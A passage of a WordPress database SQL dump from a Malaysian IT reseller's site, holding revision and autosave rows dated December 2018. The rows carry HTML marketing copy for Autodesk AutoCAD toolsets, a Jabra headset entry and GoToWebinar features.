time.</li>\r\n</ul>\r\n&nbsp;\r\n\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Autodesk','','inherit','closed','closed','','1444-revision-v1','','','2018-12-12 09:59:06','2018-12-12 01:59:06','',1444,'https://bintara.com.my/blog/2018/12/12/1444-revision-v1/',0,'revision','',0),(1751,1,'2018-12-12 14:25:07','2018-12-12 06:25:07','Office headsets\n\n<!--more-->\n\n<img class=\"alignnone size-full wp-image-1682\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Jabra-Logo.jpg\" alt=\"\" width=\"1024\" height=\"681\" />','JABRA','','inherit','closed','closed','','1393-autosave-v1','','','2018-12-12 14:25:07','2018-12-12 06:25:07','',1393,'https://bintara.com.my/blog/2018/12/12/1393-autosave-v1/',0,'revision','',0),(1752,1,'2018-12-12 10:01:33','2018-12-12 02:01:33','<div class=\"grid-columns\">\r\n<div class=\"responsive-column-0 responsive-column\">\r\n<div class=\"wd-mr-16 wd-pb-20 wd-bbw-1 wd-bc-smoke\">\r\n<div class=\"column-content parsys\">\r\n<div>\r\n<div class=\"heading section\">\r\n<h1 class=\"wd-font-40 wd-bold wd-color-white wd-uppercase\">Autodesk</h1>\r\n</div>\r\n<div class=\"text section\">\r\n<p class=\"wd-color-white wd-light wd-font-16 wd-mt-6\"><strong>Autodesk</strong> makes software for people who make things. If youâ€™ve ever driven a high-performance car, admired a towering skyscraper, used a smartphone, or watched a great film, chances are youâ€™ve experienced what millions of Autodesk customers are doing with our software.</p>\r\n\r\n<h2></h2>\r\n</div>\r\n</div>\r\n<div class=\"image parbase section\"><img class=\"cq-dd-image\" title=\"\" src=\"https://damassets.autodesk.net/content/dam/autodesk/www/products/responsive-imagery/responsive-black-lockups-banners/autocad-2019-lockup-1200x132.png\" alt=\"\" width=\"600\" height=\"66\" /></div>\r\n<div class=\"heading section\">\r\n<h2 class=\"wd-normal wd-uppercase wd-color-gray-25 wd-font-34 wd-mt-16 wd-mb-0\">ONLY ONE. AUTOCAD.</h2>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"grid-columns\">\r\n<div class=\"responsive-column-1 responsive-column\">\r\n<div class=\"wd-mr-16 wd-pt-20\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"text section\">\r\n<p class=\"wd-mt-0 wd-mb-12 wd-font-19 wd-color-gray-40\">From mechanical design aids to architecture tools to model-based GIS and mapping features, subscribe to AutoCAD software and access industry-specific toolsets, plus web and mobile apps.</p>\r\n\r\n<div class=\"heading section\">\r\n<h2></h2>\r\n<h2 class=\"pc-brand wd-light wd-font-30\">Work faster with specialized toolsets</h2>\r\n</div>\r\n<div class=\"text section\">\r\n<p class=\"wd-light wd-mv-16 wd-font-19\">AutoCAD now includes industry-specific features and libraries for architecture, mechanical design, electrical design, and more.</p>\r\n\r\n<ul class=\"wd-pl-20 wd-mv-0\">\r\n 	<li class=\"wd-font-16 wd-mb-6\">Automate floor plans, sections, elevations, and other drawings.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Draw piping, plumbing, and ducting for faster design with mechanical tools.</li>\r\n 	<li class=\"wd-font-16\">Design ductwork, electrical conduit, and circuiting for HVAC, plumbing, and electrical with MEP (mechanical, electrical, and plumbing).</li>\r\n</ul>\r\n&nbsp;\r\n<div class=\"heading section\">\r\n<h2 class=\"pc-brand wd-light wd-font-30\">Take your work with you with AutoCAD web and mobile apps</h2>\r\n</div>\r\n<div class=\"text section\">\r\n<p class=\"wd-light wd-mv-16 wd-font-19\">With a single AutoCAD subscription, work anywhere and stay connected to your DWGâ„¢ files on any platformâ€”desktop, web, or mobile. Easily move data and drawings between your desktop, web browser, and phone.</p>\r\n\r\n</div>\r\n</div>\r\n<div class=\"wd-mb-16 grid-columns\">\r\n<div class=\"responsive-column-0 responsive-column\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"heading section\">\r\n<h2></h2>\r\n<h2 class=\"pc-brand wd-light wd-font-30\">What\'s included</h2>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"large-7 grid-columns\">\r\n<div class=\"responsive-column-1 responsive-column\">\r\n<div class=\"wd-bbw-1-sm wd-bc-smoke wd-pb-24-sm\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"text section\">\r\n<p class=\"wd-light wd-mt-0 wd-mb-16 wd-font-19\">Specialized toolsets offer industry-specific features to help you design more quickly and easily:</p>\r\n\r\n<ul class=\"wd-pl-20 wd-mv-0\">\r\n 	<li class=\"wd-font-16 wd-mb-6\">Create details, views, and more.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Automate tasks and annotations.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Use a rules-driven workflow to enforce industry standards and generate schedules, lists, and tables.</li>\r\n 	<li class=\"wd-font-16\">Access libraries of symbols, parts, and detail components.</li>\r\n</ul>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"text section\">\r\n<div class=\"text section\">\r\n<div class=\"large-10 grid-columns\">\r\n<div class=\"responsive-column-0 responsive-column\">\r\n<div class=\"wd-pb-24\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"text section\">\r\n<h2></h2>\r\n<h4><img class=\"cq-dd-image\" title=\"\" src=\"https://damassets.autodesk.net/content/dam/autodesk/www/products/responsive-imagery/responsive-black-lockups-banners/autocad-2019-lockup-1200x132.png\" alt=\"\" width=\"600\" height=\"66\" /></h4>\r\n<h4 class=\"wd-font-19 wd-light wd-mb-0 wd-mt-24\">The original AutoCAD 2D and 3D CAD software provides innovative tools for design and documentation.</h4>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"grid-columns\">\r\n<div class=\"responsive-column-1 responsive-column\">\r\n<div class=\"wd-btw-1 wd-bc-very-light-grey wd-pt-12\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"text section\">\r\n<ul class=\"wd-pl-20\">\r\n 	<li class=\"wd-font-16 wd-mb-6\">Create and edit 2D geometry and 3D models with solids, surfaces, and mesh objects.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Annotate drawings with text, dimensions, leaders, and tables.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Customize the ribbon and tool palettes.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Customize with add-on apps and APIs.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Extract object data to tables.</li>\r\n 	<li class=\"wd-font-16\">Attach and import data from PDF files.</li>\r\n</ul>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"large-10 grid-columns\">\r\n<div class=\"responsive-column-0 responsive-column\">\r\n<div class=\"wd-pb-24\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"text section\">\r\n\r\n&nbsp;\r\n\r\n<img class=\"cq-dd-image\" title=\"\" src=\"https://damassets.autodesk.net/content/dam/autodesk/www/products/responsive-imagery/responsive-black-lockups-banners/autocad-architecture-2019-lockup-1200x132.png\" alt=\"\" width=\"600\" height=\"66\" />\r\n<h4 class=\"wd-font-19 wd-light wd-mb-0 wd-mt-24\">Adds features for architectural drawing, documentation, and schedules, and for automating drafting tasks.</h4>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"grid-columns\">\r\n<div class=\"responsive-column-1 responsive-column\">\r\n<div class=\"wd-btw-1 wd-bc-very-light-grey wd-pt-12\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"text section\">\r\n<ul class=\"wd-pl-20\">\r\n 	<li class=\"wd-font-16 wd-mb-6\">Create floor plans, sections, elevations, and other building design drawings using specialized tools.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Additional features include walls, door, and windows.</li>\r\n 	<li class=\"wd-font-16\">Use 8,000+ intelligent architectural objects and styles to support AIA 2nd edition, BS1192 DIN 276, ISYBAU Long Format, ISYBAU Short Format, and STLB layer standards.</li>\r\n</ul>\r\n<div class=\"large-10 grid-columns\">\r\n<div class=\"responsive-column-0 responsive-column\">\r\n<div class=\"wd-pb-24\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"text section\">\r\n\r\n&nbsp;\r\n\r\n<img class=\"cq-dd-image\" title=\"\" src=\"https://damassets.autodesk.net/content/dam/autodesk/www/products/responsive-imagery/responsive-black-lockups-banners/autocad-electrical-2019-lockup-1200x132.png\" alt=\"\" width=\"600\" height=\"66\" />\r\n<h4 class=\"wd-font-19 wd-light wd-mb-0 wd-mt-24\">Adds electrical design features to help you create, modify, and document electrical controls systems.</h4>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"grid-columns\">\r\n<div class=\"responsive-column-1 responsive-column\">\r\n<div class=\"wd-btw-1 wd-bc-very-light-grey wd-pt-12\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"text section\">\r\n<ul class=\"wd-pl-20\">\r\n 	<li class=\"wd-font-16 wd-mb-6\">Create panel layouts, schematic diagrams, and other electrical drawings using specialized tools.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Use consistent project standards with drawings organized in a project-based structure.</li>\r\n 	<li class=\"wd-font-16\">Includes a library of 65,000+ intelligent electrical symbols to support AS, GB, IEC, IEC-60617, JIC, JIS, NFPA, and IEEE standards.</li>\r\n</ul>\r\n<div class=\"large-10 grid-columns\">\r\n<div class=\"responsive-column-0 responsive-column\">\r\n<div class=\"wd-pb-24\">\r\n<div class=\"column-content parsys\">\r\n<div></div>\r\n<div class=\"image parbase section\"><img class=\"cq-dd-image\" title=\"\" src=\"https://damassets.autodesk.net/content/dam/autodesk/www/products/responsive-imagery/responsive-black-lockups-banners/autocad-map-3d-2019-lockup-460x47.png\" alt=\"\" width=\"600\" height=\"66\" /></div>\r\n<div class=\"text section\">\r\n<h4 class=\"wd-font-19 wd-light wd-mb-0 wd-mt-24\">Incorporate GIS topology with AutoCAD so you can use and maintain CAD and GIS data for planning, design, and data management.</h4>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"grid-columns\">\r\n<div class=\"responsive-column-1 responsive-column\">\r\n<div class=\"wd-btw-1 wd-bc-very-light-grey wd-pt-12\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"text section\">\r\n<ul class=\"wd-pl-20\">\r\n 	<li class=\"wd-font-16 wd-mb-6\">Create, maintain, and communicate mapping and GIS information within the AutoCAD drawing environment.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Use task-based tools to manage GIS data and aggregate it with design data.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Access spatial data stored in files, databases, and web services.</li>\r\n 	<li class=\"wd-font-16\">Use standard data schema, automated business workflows, and report templates for Electric North America, Electric Europe, Water, Wastewater, and Gas industries.</li>\r\n</ul>\r\n<div class=\"large-10 grid-columns\">\r\n<div class=\"responsive-column-0 responsive-column\">\r\n<div class=\"wd-pb-24\">\r\n<div class=\"column-content parsys\">\r\n<div></div>\r\n<div class=\"image parbase section\"><img class=\"cq-dd-image\" title=\"\" src=\"https://damassets.autodesk.net/content/dam/autodesk/www/products/responsive-imagery/responsive-black-lockups-banners/autocad-mechanical-2019-lockup-1200x132.png\" alt=\"\" width=\"600\" height=\"66\" /></div>\r\n<div class=\"text section\">\r\n<h4 class=\"wd-font-19 wd-light wd-mb-0 wd-mt-24\">Adds a library of standards-based parts and tools to help you create, modify, and document mechanical designs for manufacturing.</h4>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"grid-columns\">\r\n<div class=\"responsive-column-1 responsive-column\">\r\n<div class=\"wd-btw-1 wd-bc-very-light-grey wd-pt-12\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"text section\">\r\n<ul class=\"wd-pl-20\">\r\n 	<li class=\"wd-font-16 wd-mb-6\">Automate mechanical engineering tasks, such as generating machine components, dimensioning, and creating bills of material.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Create parts, assemblies, and other drawings for product design using specialized tools.</li>\r\n 	<li class=\"wd-font-16\">Use 700,000+ intelligent manufacturing parts, features, and symbols to support ISO, ANSI, DIN, JIS, BSI, CSN, and GB standards.</li>\r\n</ul>\r\n<div class=\"large-10 grid-columns\">\r\n<div class=\"responsive-column-0 responsive-column\">\r\n<div class=\"wd-pb-24\">\r\n<div class=\"column-content parsys\">\r\n<div></div>\r\n<div class=\"image parbase section\"><img class=\"cq-dd-image\" title=\"\" src=\"https://damassets.autodesk.net/content/dam/autodesk/www/products/responsive-imagery/responsive-black-lockups-banners/autocad-mep-2019-lockup-1200x132.png\" alt=\"\" width=\"600\" height=\"66\" /></div>\r\n<div class=\"text section\">\r\n<h4 class=\"wd-font-19 wd-light wd-mb-0 wd-mt-24\">Adds features to help you draft, design, and document MEP building systems in an AutoCAD environment.</h4>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"grid-columns\">\r\n<div class=\"responsive-column-1 responsive-column\">\r\n<div class=\"wd-btw-1 wd-bc-very-light-grey wd-pt-12\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"text section\">\r\n<ul class=\"wd-pl-20\">\r\n 	<li class=\"wd-font-16 wd-mb-6\">Create accurate construction documentation of MEP systems design.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Use task-based tools to create MEP drawings for building systems.</li>\r\n 	<li class=\"wd-font-16\">Use 10,500+ intelligent MEP objects to support AIA 2nd edition, BS1192 Descriptive, and BS1192 â€“ AUG Version 2 standards, and DIN 276, ISYBAU Long Format, ISYBAU Short Format, and STLB layer standards.</li>\r\n</ul>\r\n<div class=\"large-10 grid-columns\">\r\n<div class=\"responsive-column-0 responsive-column\">\r\n<div class=\"wd-pb-24\">\r\n<div class=\"column-content parsys\">\r\n<div></div>\r\n<div class=\"image parbase section\"><img class=\"cq-dd-image\" title=\"\" src=\"https://damassets.autodesk.net/content/dam/autodesk/www/products/responsive-imagery/responsive-black-lockups-banners/autocad-plant-3d-2019-lockup-1200x132.png\" alt=\"\" width=\"600\" height=\"66\" /></div>\r\n<div class=\"text section\">\r\n<h4 class=\"wd-font-19 wd-light wd-mb-0 wd-mt-24\">Adds features to help you produce P&amp;IDs, and then integrate them into a 3D plant design model.</h4>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"grid-columns\">\r\n<div class=\"responsive-column-1 responsive-column\">\r\n<div class=\"wd-btw-1 wd-bc-very-light-grey wd-pt-12\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"text section\">\r\n<ul class=\"wd-pl-20\">\r\n 	<li class=\"wd-font-16 wd-mb-6\">Generate and share isometrics, orthographics, and materials reports.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Create schematic diagrams, plant layouts, and other drawings for plant design using specialized tools.</li>\r\n 	<li class=\"wd-font-16\">Includes a library of 400+ intelligent plant objects such as equipment templates, support templates, and structural members to support 40 standards, including ANSI and DIN.</li>\r\n</ul>\r\n<div class=\"large-10 grid-columns\">\r\n<div class=\"responsive-column-0 responsive-column\">\r\n<div class=\"wd-pb-24\">\r\n<div class=\"column-content parsys\">\r\n<div></div>\r\n<div class=\"image parbase section\"><img class=\"cq-dd-image\" title=\"\" src=\"https://damassets.autodesk.net/content/dam/autodesk/www/products/responsive-imagery/responsive-black-lockups-banners/autocad-raster-design-2019-lockup-1200x132.png\" alt=\"\" width=\"600\" height=\"66\" /></div>\r\n<div class=\"text section\">\r\n<h4 class=\"wd-font-19 wd-light wd-mb-0 wd-mt-24\">Adds raster-to-vector tools to help you convert raster images into DWGâ„¢ objects. Edit scanned drawings in a familiar AutoCAD environment.</h4>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"grid-columns\">\r\n<div class=\"responsive-column-1 responsive-column\">\r\n<div class=\"wd-btw-1 wd-bc-very-light-grey wd-pt-12\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"text section\">\r\n<ul class=\"wd-pl-20\">\r\n 	<li class=\"wd-font-16 wd-mb-6\">Despeckle, bias, mirror, and touch up your images.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Use standard AutoCAD commands on raster regions and primitives. Easily erase raster images, lines, arcs, and circles.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Create lines and polylines from raster images, and convert raster files into vector drawings.</li>\r\n 	<li class=\"wd-font-16\">Show and analyze geo images in Civil 3D civil engineering software and the AutoCAD Map 3D toolset.</li>\r\n</ul>\r\n<div class=\"large-10 grid-columns\">\r\n<div class=\"responsive-column-0 responsive-column\">\r\n<div class=\"wd-pb-24\">\r\n<div class=\"column-content parsys\">\r\n<div></div>\r\n<div class=\"image parbase section\"><img class=\"cq-dd-image\" title=\"\" src=\"https://damassets.autodesk.net/content/dam/autodesk/www/products/responsive-imagery/responsive-lockups-banners/2019/autocad-web-app-2019-lockup-1200x132.png\" alt=\"\" width=\"600\" height=\"66\" /></div>\r\n<div class=\"text section\">\r\n<h4 class=\"wd-font-19 wd-light wd-mb-0 wd-mt-24\">Access AutoCAD from any computer.</h4>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"grid-columns\">\r\n<div class=\"responsive-column-1 responsive-column\">\r\n<div class=\"wd-btw-1 wd-bc-very-light-grey wd-pt-12\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"text section\">\r\n<ul class=\"wd-pl-20\">\r\n 	<li class=\"wd-font-16 wd-mb-6\">View, create, and edit AutoCAD drawings.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Work on the latest drawings from anywhere.</li>\r\n 	<li class=\"wd-font-16\">Access updates in real time.</li>\r\n</ul>\r\n&nbsp;\r\n\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Autodesk','','inherit','closed','closed','','1444-revision-v1','','','2018-12-12 10:01:33','2018-12-12 02:01:33','',1444,'https://bintara.com.my/blog/2018/12/12/1444-revision-v1/',0,'revision','',0),(1975,1,'2018-12-13 19:22:42','2018-12-13 11:22:42','<h3 class=\"section-header__subheadline\">Our easy-to-use technology allows you to actually have fun presenting. And our fully interactive features ensure you keep attendees glued to their screen.</h3>\r\nGoToWebinar erases the headache and hassle from webinars. No matter your goal or skill level, youâ€™ll quickly see why so many love GoToWebinar. Go from preparing a webinar to presenting in fewer steps â€“ and have a lot of fun along the way.\r\n\r\n<img class=\" wp-image-1977 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/gotowebinar.png\" alt=\"\" width=\"434\" height=\"298\" />\r\n<div class=\"check-and-text__stacked\">\r\n<ul>\r\n 	<li class=\"check-and-text__title\">Engagement Dashboard -- Keep an eye on attentiveness, hands raised and time elapsed.</li>\r\n</ul>\r\n</div>\r\n<div class=\"check-and-text__stacked\">\r\n<ul>\r\n 	<li class=\"check-and-text__title\">Presenter Webcams -- Show off your bright smile and invite panelists to do the same.</li>\r\n</ul>\r\n</div>\r\n<div class=\"check-and-text__stacked\">\r\n<ul>\r\n 	<li class=\"check-and-text__title\">Polls &amp; Surveys -- Engage your audience with slide-in questions and live results.</li>\r\n</ul>\r\n[maxbutton id=\"1\" ]\r\n\r\n&nbsp;\r\n\r\n<iframe src=\"https://www.youtube.com/embed/uDdg_Z2KzHs\" width=\"800\" height=\"450\" frameborder=\"0\" allowfullscreen=\"allowfullscreen\"></iframe>\r\n\r\n&nbsp;\r\n\r\n</div>','GoToWebinar','','inherit','closed','closed','','1633-autosave-v1','','','2018-12-13 19:22:42','2018-12-13 11:22:42','',1633,'https://bintara.com.my/blog/2018/12/12/1633-autosave-v1/',0,'revision','',0),(1755,1,'2018-12-12 10:03:42','2018-12-12 02:03:42','<div class=\"grid-columns\">\r\n<div class=\"responsive-column-0 responsive-column\">\r\n<div class=\"wd-mr-16 wd-pb-20 wd-bbw-1 wd-bc-smoke\">\r\n<div class=\"column-content parsys\">\r\n<div>\r\n<div class=\"heading section\">\r\n<h1 class=\"wd-font-40 wd-bold wd-color-white wd-uppercase\">Autodesk</h1>\r\n</div>\r\n<div class=\"text section\">\r\n<p class=\"wd-color-white wd-light wd-font-16 wd-mt-6\"><strong>Autodesk</strong> makes software for people who make things. If youâ€™ve ever driven a high-performance car, admired a towering skyscraper, used a smartphone, or watched a great film, chances are youâ€™ve experienced what millions of Autodesk customers are doing with our software.</p>\r\n\r\n<h2></h2>\r\n</div>\r\n</div>\r\n<div class=\"image parbase section\"><img class=\"cq-dd-image\" title=\"\" src=\"https://damassets.autodesk.net/content/dam/autodesk/www/products/responsive-imagery/responsive-black-lockups-banners/autocad-2019-lockup-1200x132.png\" alt=\"\" width=\"600\" height=\"66\" /></div>\r\n<div class=\"heading section\">\r\n<h2 class=\"wd-normal wd-uppercase wd-color-gray-25 wd-font-34 wd-mt-16 wd-mb-0\">ONLY ONE. AUTOCAD.</h2>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"grid-columns\">\r\n<div class=\"responsive-column-1 responsive-column\">\r\n<div class=\"wd-mr-16 wd-pt-20\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"text section\">\r\n<p class=\"wd-mt-0 wd-mb-12 wd-font-19 wd-color-gray-40\">From mechanical design aids to architecture tools to model-based GIS and mapping features, subscribe to AutoCAD software and access industry-specific toolsets, plus web and mobile apps.</p>\r\n\r\n<div class=\"heading section\">\r\n<h2></h2>\r\n<h2 class=\"pc-brand wd-light wd-font-30\">Work faster with specialized toolsets</h2>\r\n</div>\r\n<div class=\"text section\">\r\n<p class=\"wd-light wd-mv-16 wd-font-19\">AutoCAD now includes industry-specific features and libraries for architecture, mechanical design, electrical design, and more.</p>\r\n\r\n<ul class=\"wd-pl-20 wd-mv-0\">\r\n 	<li class=\"wd-font-16 wd-mb-6\">Automate floor plans, sections, elevations, and other drawings.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Draw piping, plumbing, and ducting for faster design with mechanical tools.</li>\r\n 	<li class=\"wd-font-16\">Design ductwork, electrical conduit, and circuiting for HVAC, plumbing, and electrical with MEP (mechanical, electrical, and plumbing).</li>\r\n</ul>\r\n&nbsp;\r\n<div class=\"heading section\">\r\n<h2 class=\"pc-brand wd-light wd-font-30\">Take your work with you with AutoCAD web and mobile apps</h2>\r\n</div>\r\n<div class=\"text section\">\r\n<p class=\"wd-light wd-mv-16 wd-font-19\">With a single AutoCAD subscription, work anywhere and stay connected to your DWGâ„¢ files on any platformâ€”desktop, web, or mobile. Easily move data and drawings between your desktop, web browser, and phone.</p>\r\n\r\n</div>\r\n</div>\r\n<div class=\"wd-mb-16 grid-columns\">\r\n<div class=\"responsive-column-0 responsive-column\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"heading section\">\r\n<h2></h2>\r\n<h2 class=\"pc-brand wd-light wd-font-30\">What\'s included</h2>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"large-7 grid-columns\">\r\n<div class=\"responsive-column-1 responsive-column\">\r\n<div class=\"wd-bbw-1-sm wd-bc-smoke wd-pb-24-sm\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"text section\">\r\n<p class=\"wd-light wd-mt-0 wd-mb-16 wd-font-19\">Specialized toolsets offer industry-specific features to help you design more quickly and easily:</p>\r\n\r\n<ul class=\"wd-pl-20 wd-mv-0\">\r\n 	<li class=\"wd-font-16 wd-mb-6\">Create details, views, and more.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Automate tasks and annotations.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Use a rules-driven workflow to enforce industry standards and generate schedules, lists, and tables.</li>\r\n 	<li class=\"wd-font-16\">Access libraries of symbols, parts, and detail components.</li>\r\n</ul>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"text section\">\r\n<div class=\"text section\">\r\n<div class=\"large-10 grid-columns\">\r\n<div class=\"responsive-column-0 responsive-column\">\r\n<div class=\"wd-pb-24\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"text section\">\r\n<h2></h2>\r\n<h4><img class=\"cq-dd-image\" title=\"\" src=\"https://damassets.autodesk.net/content/dam/autodesk/www/products/responsive-imagery/responsive-black-lockups-banners/autocad-2019-lockup-1200x132.png\" alt=\"\" width=\"600\" height=\"66\" /></h4>\r\n<h4 class=\"wd-font-19 wd-light wd-mb-0 wd-mt-24\">The original AutoCAD 2D and 3D CAD software provides innovative tools for design and documentation.</h4>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"grid-columns\">\r\n<div class=\"responsive-column-1 responsive-column\">\r\n<div class=\"wd-btw-1 wd-bc-very-light-grey wd-pt-12\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"text section\">\r\n<ul class=\"wd-pl-20\">\r\n 	<li class=\"wd-font-16 wd-mb-6\">Create and edit 2D geometry and 3D models with solids, surfaces, and mesh objects.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Annotate drawings with text, dimensions, leaders, and tables.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Customize the ribbon and tool palettes.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Customize with add-on apps and APIs.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Extract object data to tables.</li>\r\n 	<li class=\"wd-font-16\">Attach and import data from PDF files.</li>\r\n</ul>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"large-10 grid-columns\">\r\n<div class=\"responsive-column-0 responsive-column\">\r\n<div class=\"wd-pb-24\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"text section\">\r\n\r\n&nbsp;\r\n\r\n<img class=\"cq-dd-image\" title=\"\" src=\"https://damassets.autodesk.net/content/dam/autodesk/www/products/responsive-imagery/responsive-black-lockups-banners/autocad-architecture-2019-lockup-1200x132.png\" alt=\"\" width=\"600\" height=\"66\" />\r\n<h4 class=\"wd-font-19 wd-light wd-mb-0 wd-mt-24\">Adds features for architectural drawing, documentation, and schedules, and for automating drafting tasks.</h4>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"grid-columns\">\r\n<div class=\"responsive-column-1 responsive-column\">\r\n<div class=\"wd-btw-1 wd-bc-very-light-grey wd-pt-12\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"text section\">\r\n<ul class=\"wd-pl-20\">\r\n 	<li class=\"wd-font-16 wd-mb-6\">Create floor plans, sections, elevations, and other building design drawings using specialized tools.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Additional features include walls, door, and windows.</li>\r\n 	<li class=\"wd-font-16\">Use 8,000+ intelligent architectural objects and styles to support AIA 2nd edition, BS1192 DIN 276, ISYBAU Long Format, ISYBAU Short Format, and STLB layer standards.</li>\r\n</ul>\r\n<div class=\"large-10 grid-columns\">\r\n<div class=\"responsive-column-0 responsive-column\">\r\n<div class=\"wd-pb-24\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"text section\">\r\n\r\n&nbsp;\r\n\r\n<img class=\"cq-dd-image\" title=\"\" src=\"https://damassets.autodesk.net/content/dam/autodesk/www/products/responsive-imagery/responsive-black-lockups-banners/autocad-electrical-2019-lockup-1200x132.png\" alt=\"\" width=\"600\" height=\"66\" />\r\n<h4 class=\"wd-font-19 wd-light wd-mb-0 wd-mt-24\">Adds electrical design features to help you create, modify, and document electrical controls systems.</h4>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"grid-columns\">\r\n<div class=\"responsive-column-1 responsive-column\">\r\n<div class=\"wd-btw-1 wd-bc-very-light-grey wd-pt-12\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"text section\">\r\n<ul class=\"wd-pl-20\">\r\n 	<li class=\"wd-font-16 wd-mb-6\">Create panel layouts, schematic diagrams, and other electrical drawings using specialized tools.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Use consistent project standards with drawings organized in a project-based structure.</li>\r\n 	<li class=\"wd-font-16\">Includes a library of 65,000+ intelligent electrical symbols to support AS, GB, IEC, IEC-60617, JIC, JIS, NFPA, and IEEE standards.</li>\r\n</ul>\r\n<div class=\"large-10 grid-columns\">\r\n<div class=\"responsive-column-0 responsive-column\">\r\n<div class=\"wd-pb-24\">\r\n<div class=\"column-content parsys\">\r\n<div></div>\r\n<div class=\"image parbase section\"><img class=\"cq-dd-image\" title=\"\" 